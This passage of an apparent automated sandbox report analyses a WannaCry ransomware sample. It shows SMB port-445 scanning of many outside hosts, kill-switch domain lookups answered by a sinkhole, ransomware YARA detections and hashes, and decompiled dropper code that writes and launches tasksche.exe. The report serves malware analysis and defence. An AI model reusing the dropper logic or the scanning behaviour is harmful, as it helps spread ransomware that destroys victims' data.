                                                          May 8, 2023 05:37:47.093091965 CEST53312445192.168.2.694.152.196.183
                                                          May 8, 2023 05:37:47.093135118 CEST53313445192.168.2.637.33.69.79
                                                          May 8, 2023 05:37:47.093204021 CEST53314445192.168.2.630.46.83.126
                                                          May 8, 2023 05:37:47.093296051 CEST53315445192.168.2.680.219.212.189
                                                          May 8, 2023 05:37:47.093306065 CEST53316445192.168.2.65.55.60.99
                                                          May 8, 2023 05:37:47.093483925 CEST53317445192.168.2.6133.247.91.247
                                                          May 8, 2023 05:37:47.093614101 CEST53320445192.168.2.690.94.80.82
                                                          May 8, 2023 05:37:47.093683004 CEST53318445192.168.2.6202.130.75.131
                                                          May 8, 2023 05:37:47.093683958 CEST53319445192.168.2.6208.121.92.157
                                                          May 8, 2023 05:37:47.093703985 CEST53321445192.168.2.613.121.10.134
                                                          May 8, 2023 05:37:47.093744040 CEST53322445192.168.2.689.118.189.173
                                                          May 8, 2023 05:37:47.093812943 CEST53323445192.168.2.6210.233.173.194
                                                          May 8, 2023 05:37:47.093857050 CEST53324445192.168.2.6218.88.100.220
                                                          May 8, 2023 05:37:47.093935966 CEST53325445192.168.2.6190.229.110.83
                                                          May 8, 2023 05:37:47.093967915 CEST53326445192.168.2.622.170.55.156
                                                          May 8, 2023 05:37:47.184571981 CEST52534445192.168.2.6137.132.36.25
                                                          May 8, 2023 05:37:47.887772083 CEST52584445192.168.2.6137.132.36.1
                                                          May 8, 2023 05:37:48.340919018 CEST52586445192.168.2.6137.132.36.1
                                                          May 8, 2023 05:37:49.981755018 CEST53274445192.168.2.6107.165.99.84
                                                          May 8, 2023 05:37:50.091051102 CEST53298445192.168.2.6106.146.69.115
                                                          May 8, 2023 05:37:50.091079950 CEST53300445192.168.2.632.190.76.248
                                                          May 8, 2023 05:37:50.091082096 CEST53321445192.168.2.613.121.10.134
                                                          May 8, 2023 05:37:50.091082096 CEST53302445192.168.2.684.101.1.66
                                                          May 8, 2023 05:37:50.092516899 CEST53307445192.168.2.6161.215.214.65
                                                          May 8, 2023 05:37:50.092516899 CEST53315445192.168.2.680.219.212.189
                                                          May 8, 2023 05:37:50.093786955 CEST53319445192.168.2.6208.121.92.157
                                                          May 8, 2023 05:37:50.106698036 CEST53304445192.168.2.6208.203.75.158
                                                          May 8, 2023 05:37:50.106714964 CEST53317445192.168.2.6133.247.91.247
                                                          May 8, 2023 05:37:50.106722116 CEST53305445192.168.2.684.162.87.184
                                                          May 8, 2023 05:37:50.106723070 CEST53301445192.168.2.6177.102.4.186
                                                          May 8, 2023 05:37:50.106723070 CEST53306445192.168.2.6130.43.157.50
                                                          May 8, 2023 05:37:50.106743097 CEST53320445192.168.2.690.94.80.82
                                                          May 8, 2023 05:37:50.106744051 CEST53322445192.168.2.689.118.189.173
                                                          May 8, 2023 05:37:50.106761932 CEST53310445192.168.2.697.203.137.33
                                                          May 8, 2023 05:37:50.106767893 CEST53297445192.168.2.698.141.18.219
                                                          May 8, 2023 05:37:50.106767893 CEST53324445192.168.2.6218.88.100.220
                                                          May 8, 2023 05:37:50.106770992 CEST53303445192.168.2.610.220.143.141
                                                          May 8, 2023 05:37:50.106770992 CEST53325445192.168.2.6190.229.110.83
                                                          May 8, 2023 05:37:50.106770992 CEST53326445192.168.2.622.170.55.156
                                                          May 8, 2023 05:37:50.106770992 CEST53323445192.168.2.6210.233.173.194
                                                          May 8, 2023 05:37:50.106775999 CEST53309445192.168.2.6194.142.210.45
                                                          May 8, 2023 05:37:50.106775999 CEST53313445192.168.2.637.33.69.79
                                                          May 8, 2023 05:37:50.106775999 CEST53308445192.168.2.644.47.196.196
                                                          May 8, 2023 05:37:50.106775999 CEST53314445192.168.2.630.46.83.126
                                                          May 8, 2023 05:37:50.106775999 CEST53316445192.168.2.65.55.60.99
                                                          May 8, 2023 05:37:50.108485937 CEST53299445192.168.2.641.58.178.121
                                                          May 8, 2023 05:37:50.108485937 CEST53318445192.168.2.6202.130.75.131
                                                          May 8, 2023 05:37:50.108500957 CEST53312445192.168.2.694.152.196.183
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 8, 2023 05:35:38.893922091 CEST5957553192.168.2.68.8.8.8
                                                          May 8, 2023 05:35:38.928792953 CEST53595758.8.8.8192.168.2.6
                                                          May 8, 2023 05:35:39.859180927 CEST4978653192.168.2.68.8.8.8
                                                          May 8, 2023 05:35:39.885539055 CEST53497868.8.8.8192.168.2.6
                                                          May 8, 2023 05:36:22.378782034 CEST138138192.168.2.6192.168.2.255
                                                          TimestampSource IPDest IPChecksumCodeType
                                                          May 8, 2023 05:35:50.616421938 CEST38.140.156.98192.168.2.67d30(Unknown)Destination Unreachable
                                                          May 8, 2023 05:35:54.886532068 CEST217.246.253.154192.168.2.6d16c(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:01.887576103 CEST186.108.26.254192.168.2.671f3(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:36:09.238343954 CEST68.175.2.246192.168.2.676d(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:09.464803934 CEST96.1.215.3192.168.2.6bd92(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:12.087182999 CEST105.187.232.129192.168.2.64827(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:36:17.490365982 CEST89.75.24.201192.168.2.6dfbc(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:19.832329988 CEST92.119.92.187192.168.2.69fac(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:20.864923954 CEST92.66.219.153192.168.2.6f7b2(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:24.478492022 CEST84.176.222.96192.168.2.6242e(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:28.312347889 CEST94.177.158.230192.168.2.64e95(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:29.003174067 CEST209.66.125.170192.168.2.64b13(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:30.362375021 CEST88.67.240.145192.168.2.6f5ab(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:30.375884056 CEST91.65.107.142192.168.2.6c62f(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:35.104742050 CEST103.178.176.198192.168.2.6bbec(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:40.532717943 CEST105.27.206.26192.168.2.667ac(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:45.466254950 CEST47.200.215.122192.168.2.6c70a(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:45.572299957 CEST45.122.229.86192.168.2.62cc1(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:46.305155993 CEST79.239.54.192192.168.2.66389(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:46.317624092 CEST38.32.96.202192.168.2.6e6b8(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:46.754967928 CEST162.144.240.75192.168.2.6c1e3(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:46.898929119 CEST4.14.234.250192.168.2.63b9b(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:36:49.218168974 CEST179.108.117.214192.168.2.6773f(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:36:49.614840984 CEST140.227.218.242192.168.2.62bec(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:53.327135086 CEST46.5.58.40192.168.2.69280(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:53.443690062 CEST47.204.103.2192.168.2.65696(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:53.630304098 CEST43.232.241.1192.168.2.6dda3(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:36:54.540024042 CEST69.18.32.6192.168.2.6d9d1(Unknown)Destination Unreachable
                                                          May 8, 2023 05:36:58.077032089 CEST213.221.239.159192.168.2.6a93c(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:00.034257889 CEST93.227.15.210192.168.2.654ae(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:11.440958977 CEST109.234.22.39192.168.2.643e3(Port unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:12.658885002 CEST193.138.178.5192.168.2.669bc(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:37:13.612190962 CEST170.250.167.14192.168.2.611d1(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:15.848834991 CEST162.34.238.2192.168.2.66cbb(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:37:17.059194088 CEST46.15.52.107192.168.2.6da5(Port unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:17.080786943 CEST103.11.5.25192.168.2.62bef(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:18.515336990 CEST186.177.66.26192.168.2.6a032(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:37:19.922708988 CEST180.217.26.92192.168.2.6f450(Port unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:23.639622927 CEST217.29.66.150192.168.2.61d29(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:27.132967949 CEST69.156.254.134192.168.2.6971b(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:37:31.345314026 CEST94.217.117.56192.168.2.66fa1(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:33.895522118 CEST205.134.10.45192.168.2.697db(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:34.814934015 CEST92.75.252.27192.168.2.6ae0e(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:37.050246954 CEST91.43.83.114192.168.2.6f4ea(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:37.313261986 CEST218.102.39.225192.168.2.62abb(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:39.509469986 CEST210.214.225.225192.168.2.65e4f(Time to live exceeded in transit)Time Exceeded
                                                          May 8, 2023 05:37:40.373326063 CEST115.186.148.250192.168.2.656e8(Host unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:42.425118923 CEST24.142.57.66192.168.2.6d0b2(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:45.493221998 CEST24.142.57.66192.168.2.6d0b2(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:46.008178949 CEST91.64.94.57192.168.2.625f8(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:46.111607075 CEST140.174.21.18192.168.2.65306(Net unreachable)Destination Unreachable
                                                          May 8, 2023 05:37:47.136049986 CEST94.152.196.183192.168.2.6e31a(Unknown)Destination Unreachable
                                                          May 8, 2023 05:37:50.151130915 CEST94.152.196.183192.168.2.6e31a(Unknown)Destination Unreachable
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          May 8, 2023 05:35:38.893922091 CEST192.168.2.68.8.8.80x4d4Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false
                                                          May 8, 2023 05:35:39.859180927 CEST192.168.2.68.8.8.80x6389Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          May 8, 2023 05:35:38.928792953 CEST8.8.8.8192.168.2.60x4d4No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false
                                                          May 8, 2023 05:35:38.928792953 CEST8.8.8.8192.168.2.60x4d4No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
                                                          May 8, 2023 05:35:39.885539055 CEST8.8.8.8192.168.2.60x6389No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false
                                                          May 8, 2023 05:35:39.885539055 CEST8.8.8.8192.168.2.60x6389No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
                                                          • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649704104.16.173.8080C:\Users\user\Desktop\stN592INV6.exe
                                                          TimestampkBytes transferredDirectionData
                                                          May 8, 2023 05:35:38.979065895 CEST91OUTGET / HTTP/1.1
                                                          Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                          Cache-Control: no-cache


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1104.16.173.8080192.168.2.649704C:\Users\user\Desktop\stN592INV6.exe
                                                          TimestampkBytes transferredDirectionData
                                                          May 8, 2023 05:35:39.010205984 CEST92INHTTP/1.1 200 OK
                                                          Date: Mon, 08 May 2023 03:35:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 607
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 7c3ea7649c729b63-FRA
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.649705104.16.173.8080C:\Users\user\Desktop\stN592INV6.exe
                                                          TimestampkBytes transferredDirectionData
                                                          May 8, 2023 05:35:39.911845922 CEST93OUTGET / HTTP/1.1
                                                          Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                          Cache-Control: no-cache


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3104.16.173.8080192.168.2.649705C:\Users\user\Desktop\stN592INV6.exe
                                                          TimestampkBytes transferredDirectionData
                                                          May 8, 2023 05:35:39.944324017 CEST94INHTTP/1.1 200 OK
                                                          Date: Mon, 08 May 2023 03:35:39 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 607
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 7c3ea76a6c8b371f-FRA
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:05:35:37
                                                          Start date:08/05/2023
                                                          Path:C:\Users\user\Desktop\stN592INV6.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\stN592INV6.exe
                                                          Imagebase:0x400000
                                                          File size:3751936 bytes
                                                          MD5 hash:31510BD9B6F5C297C64492AB86AACAA1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.349998939.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:05:35:38
                                                          Start date:08/05/2023
                                                          Path:C:\Users\user\Desktop\stN592INV6.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\stN592INV6.exe -m security
                                                          Imagebase:0x400000
                                                          File size:3751936 bytes
                                                          MD5 hash:31510BD9B6F5C297C64492AB86AACAA1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.353120233.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:05:35:39
                                                          Start date:08/05/2023
                                                          Path:C:\Windows\tasksche.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\WINDOWS\tasksche.exe /i
                                                          Imagebase:0x400000
                                                          File size:3514368 bytes
                                                          MD5 hash:7F7CCAA16FB15EB1C7399D422F8363E8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.355218955.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                                                          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 98%, ReversingLabs
                                                          Reputation:moderate

                                                          Reset < >
                                                            C-Code - Quality: 86%
                                                            			E00407CE0() {
                                                            				void _v259;
                                                            				char _v260;
                                                            				void _v519;
                                                            				char _v520;
                                                            				struct _STARTUPINFOA _v588;
                                                            				struct _PROCESS_INFORMATION _v604;
                                                            				long _v608;
                                                            				_Unknown_base(*)()* _t36;
                                                            				void* _t38;
                                                            				void* _t39;
                                                            				void* _t50;
                                                            				int _t59;
                                                            				struct HINSTANCE__* _t104;
                                                            				struct HRSRC__* _t105;
                                                            				void* _t107;
                                                            				void* _t108;
                                                            				long _t109;
                                                            				intOrPtr _t121;
                                                            				intOrPtr _t122;
                                                            
                                                            				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                            				if(_t104 != 0) {
                                                            					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                            					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                            					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                            					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                            					 *0x43144c = _t36;
                                                            					if( *0x431478 != 0) {
                                                            						_t121 =  *0x431458; // 0x746af7b0
                                                            						if(_t121 != 0) {
                                                            							_t122 =  *0x431460; // 0x746afc30
                                                            							if(_t122 != 0 && _t36 != 0) {
                                                            								_t105 = FindResourceA(0, 0x727, "R");
                                                            								if(_t105 != 0) {
                                                            									_t38 = LoadResource(0, _t105);
                                                            									if(_t38 != 0) {
                                                            										_t39 = LockResource(_t38);
                                                            										_v608 = _t39;
                                                            										if(_t39 != 0) {
                                                            											_t109 = SizeofResource(0, _t105);
                                                            											if(_t109 != 0) {
                                                            												_v520 = 0;
                                                            												memset( &_v519, 0, 0x40 << 2);
                                                            												asm("stosw");
                                                            												asm("stosb");
                                                            												_v260 = 0;
                                                            												memset( &_v259, 0, 0x40 << 2);
                                                            												asm("stosw");
                                                            												asm("stosb");
                                                            												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                            												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                            												MoveFileExA( &_v520,  &_v260, 1); // executed
                                                            												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
                                                            												_t107 = _t50;
                                                            												if(_t107 != 0xffffffff) {
                                                            													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
                                                            													FindCloseChangeNotification(_t107); // executed
                                                            													_v604.hThread = 0;
                                                            													_v604.dwProcessId = 0;
                                                            													_v604.dwThreadId = 0;
                                                            													memset( &(_v588.lpReserved), 0, 0x10 << 2);
                                                            													asm("repne scasb");
                                                            													_v604.hProcess = 0;
                                                            													_t108 = " /i";
                                                            													asm("repne scasb");
                                                            													memcpy( &_v520 - 1, _t108, 0 << 2);
                                                            													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                            													_v588.cb = 0x44;
                                                            													_v588.wShowWindow = 0;
                                                            													_v588.dwFlags = 0x81;
                                                            													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
                                                            													if(_t59 != 0) {
                                                            														CloseHandle(_v604.hThread);
                                                            														CloseHandle(_v604);
